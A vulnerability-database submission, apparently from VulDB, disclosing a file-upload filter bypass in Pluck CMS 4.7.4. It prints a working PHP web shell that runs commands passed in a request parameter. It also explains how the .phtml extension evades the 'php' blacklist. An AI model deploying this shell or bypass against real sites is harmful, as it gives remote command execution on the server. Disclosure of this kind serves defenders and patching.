제출 #30: Pluck CMS 4.7.4 Shell Upload Filter Bypass정보

제목Pluck CMS 4.7.4 Shell Upload Filter Bypass
설명From the admin interface choose: Pages -> Manage Files Create the following simple command shell and name it simple-backdoor.phtml <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?> The .phtml (executable extension) defeats the “blacklist” approach taken in this app in regards to allowable file extensions. Which is searching for ‘php’ as the last 3 characters i.e the extension. PHTML along w/ php2..php3 and so on defeated this filter. You get a shell in the context of the web server.
원천⚠️ https://github.com/pluck-cms
사용자
 s7acktrac3 (UID 865)
제출2018. 05. 25. PM 01:22 (8 연령 ago)
모더레이션2018. 05. 25. PM 05:32 (4 hours later)
상태수락
VulDB 항목118203 [Pluck 4.7.4 Manage Files Page 권한 상승]
포인트들17

Might our Artificial Intelligence support you?

Check our Alexa App!